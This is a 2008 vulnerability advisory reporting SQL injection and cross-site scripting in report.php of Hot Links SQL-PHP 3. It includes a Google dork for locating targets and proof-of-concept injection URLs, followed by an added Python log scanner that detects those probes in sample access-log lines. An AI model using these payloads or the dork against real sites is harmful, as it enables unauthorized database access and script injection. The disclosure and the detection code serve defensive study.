packetstormsecurity.com | sl4xUz | PACKETSTORM:69764
Sep 09, 2008 - 12:00 a.m.

hotlinks-sqlxss.txt

`###########################################################  
#   
# ___ __ __ __ __   
# /\_ \ /\ \\ \ /\ \/\ \   
# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____   
# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\   
# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_   
# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\  
# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/  
#   
# security breakd0wn!  
###########################################################  
#   
# Title: Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities  
# Vendor: http://www.mrcgiguy.com  
# Vulnerable Version: 3 and prior versions  
# Fix: N/A  
#   
###########################################################  
#   
# c0ntact: sl4x.xuz[at]gmail[dot]com  
# d0rk: "Powered By: Hot Links SQL-PHP 3"  
# stop lammo  
#   
###########################################################  
  
######################  
1. Information  
######################  
Hot Links was the initial script developed by Mr CGI Guy back in 2001 as a simple way to manage outgoing links. It was initially introduced as Hot Links Lite and was distributed for free.  
  
######################  
2. Vulnerabilities  
######################  
SQL Injection in "report.php" in the "id" parameter.  
Cross Site Scripting in "report.php" in the "id" parameter.  
  
######################  
3. PoC  
######################  
http://localhost/path/report.php?id=-1/**/union/**/select/**/version(),2,3--  
http://localhost/path/report.php?id=[XSS]  
  
###########################################################  
  
`
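
Since the advisory lists no fix, one way to spot probing of the "id" parameter of report.php in web-server access logs is sketched below. This is an added example, not part of the original advisory or the vendor's code. It assumes legitimate "id" values are plain decimal integers, uses constructed log lines, and the names `scan` and `classify` are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache access-log style; not from a real server.
SAMPLE_LOG = """\
198.51.100.7 - - [09/Sep/2008:10:01:02 +0000] "GET /links/report.php?id=42 HTTP/1.1" 200 512
198.51.100.9 - - [09/Sep/2008:10:01:05 +0000] "GET /links/report.php?id=-1/**/union/**/select/**/version(),2,3-- HTTP/1.1" 200 498
198.51.100.9 - - [09/Sep/2008:10:01:09 +0000] "GET /links/report.php?id=-1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1,2,3-- HTTP/1.1" 200 498
203.0.113.4 - - [09/Sep/2008:10:02:11 +0000] "GET /links/report.php?id=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 530
203.0.113.5 - - [09/Sep/2008:10:03:00 +0000] "GET /links/index.php?id=abc HTTP/1.1" 200 100
203.0.113.6 - - [09/Sep/2008:10:03:30 +0000] "GET /links/report.php?id=7%27 HTTP/1.1" 200 100
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")


def classify(value):
    """Label an id value; None means plain decimal (assumed legitimate form)."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    # Inline comments stand in for spaces in the PoC, so fold them to spaces.
    folded = SQL_COMMENT.sub(" ", value).lower()
    if UNION_SELECT.search(folded):
        return "sqli-union"
    if "<" in value or ">" in value:
        return "markup"
    return "non-numeric"


def scan(log_text):
    """Return (client, label, decoded id) for suspicious report.php requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/report.php"):
            continue
        # parse_qs percent-decodes, so encoded variants classify the same way.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            label = classify(value)
            if label:
                findings.append((client, label, value))
    return findings
```

The same integer-only rule can be enforced in front of the script (for example in a reverse proxy or WAF rule) so that any non-numeric "id" is rejected before it reaches report.php.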